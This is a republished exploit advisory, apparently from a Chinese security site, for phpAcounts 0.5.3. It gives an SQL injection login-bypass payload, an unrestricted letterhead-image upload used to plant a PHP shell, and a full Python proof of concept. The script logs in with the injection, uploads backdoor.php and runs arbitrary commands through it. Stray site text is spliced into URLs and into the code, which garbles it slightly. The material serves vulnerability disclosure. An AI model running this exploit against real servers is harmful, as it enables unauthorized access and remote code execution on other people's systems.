标题 phpAcounts v.0.5.3 SQL Injection 作者: loneferret 影响版本: 0.5.3 开发者地址: http://phpaccounts.com/ 测试平台: Ubuntu Server 11.10 # Old app, still fun. Auth. Bypass: http:// www.2cto.com / phpaccounts/index.php Username: x' or '1'='1'# Password: <whatever> Upload php shell in preferences Letterhead image upload does not sanitize file extensions. http://server/index.php?page=tasks&action=preferences Acess shell: Where '1' is the user's ID. http://server/phpaccounts/users/1/<filename> ---- Python PoC --------- #!/usr/bin/python import re, mechanize import urllib, sys print "\n[*] phpAcounts v.0.5.3 Remote Code Execution" print "[*] Vulnerability discovered by loneferret" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 3): print "[*] Usage: poc.py <RHOST> <RCMD>" exit(0) rhost = sys.argv[1] rcmd = sys.argv[2] print "[*] Bypassing Login ." try: br = mechanize.Browser() br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost) assert br.viewing_ html () br.select_form(name="loginForm") br.select_form(nr=0) br.form['Login_Username'] = "x' or '1'#" br.form['Login_Password'] = "pwnd" print "[*] Triggering SQLi .." br.submit() except: print "[*] Oups..Something happened" exit(0) print "[*] Uploading Shell ..." try: br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost) assert br.viewing_html() br.select_form(nr=0) br.form["Preferences[LETTER_HEADER]"] = 'test' br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image") br.submit(nr=2) except: print "[*] Upload didn't work" exit(0) print "[*] Command Executed\n" try: www.2cto.com shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd)) print shell.read() except: print "[*] Oups." exit(0)
查看更多关于phpAcounts v.0.5.3 SQL注射及修复 - 网站安全 - 自学的详细内容...